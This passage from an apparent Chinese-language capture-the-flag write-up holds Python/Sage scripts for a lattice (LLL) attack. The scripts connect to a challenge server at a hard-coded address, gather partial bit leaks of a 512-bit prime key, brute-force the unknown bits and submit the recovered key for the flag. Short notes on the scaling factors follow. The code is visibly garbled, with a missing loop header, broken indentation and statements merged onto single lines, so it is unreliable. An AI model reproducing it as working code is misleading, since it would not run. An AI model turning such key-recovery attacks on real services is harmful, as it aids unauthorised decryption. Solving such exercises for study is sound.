                found_key = key_candidate
                break
                if found_key:
                    break
        if found_key:
            io.sendlineafter(b"the key to the flag is: ", str(found_key).encode())
            flag = io.recvline()
            print(f"Flag: {flag}")
        else:
            print("未能恢复密钥")
        io.close()

attack_server()
            
    

但是超时了，20次的2^20需要缩减

因此尝试前十轮481,6,1,24，后十轮457,30,1,24

def build_enhanced_lattice(As, leaks_info, q):
    n = len(As)
    M = matrix(ZZ, n + 2, n + 2)
    C = 2**120 
        leak_type, leak_data = leaks_info[i]
        if leak_type == 'partial':# 前10轮：[481,6,1,24] 方案
            high_6, low_24 = leak_data['gift']
            unknown_bit = leak_data['unknown_bit']
            known_part = (high_6 << (512 - 481)) | (unknown_bit << (512 - 481 - 1)) | low_24
            T_i = 2**(512 - 488) # 后10轮：[457,30,1,24] 方案
            low_24 = leak_data
            known_part = low_24 
            T_i = 2**24 
        
        M[i, i] = T_i
        M[i, n] = As[i]
        M[i, n+1] = -known_part
    
    M[n, n] = 1
    M[n+1, n+1] = C
    
    return M
    
 def optimized_hybrid_attack():
    io = remote("49.232.42.74", 32497, timeout=90)
    io.recvline()
    q = int(io.recvline().decode().split(':')[-1])
    
    As, leaks_info = [], []
    segment_bits_map = {'partial': [481, 6, 1, 24],'full': [457,30,1,24]}
    #收集前10轮数据（有未知位）
    for i in range(10):
        io.sendlineafter(b">", b"481,6,1,24")
        a_val = int(io.recvline().decode().split(':')[-1])
        gift_val = eval(io.recvline().decode().split(':')[-1])
        As.append(a_val)
        leaks_info.append(('partial', {'gift': gift_val, 'unknown_bit': None}))
        print(f"前10轮第 {i+1}/10 完成")
    # 收集后10轮数据（无未知位）
    print("收集后10轮完整数据...")
    for i in range(10):
        io.sendlineafter(b">", b"457,30,1,24")
        a_val = int(io.recvline().decode().split(':')[-1])
        gift_val = eval(io.recvline().decode().split(':')[-1])
        As.append(a_val)
        leaks_info.append(('full', gift_val[0]))
        print(f"后10轮第 {i+1}/10 完成")
        print("开始前10轮未知位爆破...")
    batch_size = 32
    unknown_combinations = list(itertools.product([0, 1], repeat=10))
    for batch_start in range(0, len(unknown_combinations), batch_size):
        batch = unknown_combinations[batch_start:batch_start + batch_size]
        print(f"处理批次 {batch_start//batch_size + 1}/{(len(unknown_combinations)+batch_size-1)//batch_size}")
        for unknown_bits in batch:
            current_leaks = leaks_info.copy()
            for i in range(10):
                current_leaks[i] = ('partial', {'gift': current_leaks[i][1]['gift'],'unknown_bit': unknown_bits[i]})
                M = build_enhanced_lattice(As, current_leaks, q)
            try:
                L = M.LLL()
                for row in L:
                    if abs(row[-1]) == 2**120 and abs(row[-2]) > 0:
                        key_candidate = abs(row[-2]) // (2**120)
                        if (key_candidate.bit_length() == 512 and is_prime(key_candidate) and
                            verify_key_comprehensive(key_candidate, As, current_leaks, q, segment_bits_map)):print(f"找到有效密钥!")
                            io.sendlineafter(b"the key to the flag is: ", str(key_candidate).encode())
                            result = io.recvline()print(f"Flag: {result.decode()}")
                            io.close()
                            return
             except Exception as e:
                 print(f"格基处理错误: {e}")
                 continue
    io.close()

有关于缩放因子C和T

C=2^(bits_key-bits_error)=2^(512-30)

但这样C过大，导致数值计算问题，实际上取2^120，使得key除以2^120后约等于2^392

T近似yi部分，即2^24